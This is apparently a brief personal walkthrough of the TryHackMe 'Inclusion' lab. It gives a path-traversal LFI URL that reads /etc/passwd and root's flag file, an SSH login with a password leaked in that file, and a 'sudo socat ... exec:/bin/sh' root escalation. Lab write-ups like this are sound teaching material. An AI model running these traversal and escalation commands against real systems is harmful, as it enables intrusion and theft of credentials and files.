Ex-iT's Notes

Inclusion

tryhackme
Inclusion

LFI

view-source:http://10.10.202.16/article?name=../../../../../../../etc/passwd

plaintext
...[snip]...
#falconfeast:rootpassword
...[snip]...

## USER
```bash
ssh falconfeast@10.10.202.16 <- rootpassword

ROOT

bash
sudo -l

Shows socat can be execute as root

bash
sudo socat stdin exec:/bin/sh

NOTES

The web app is running as root.

So to get the root flag: http://10.10.202.16/article?name=../../../../../../../root/root.txt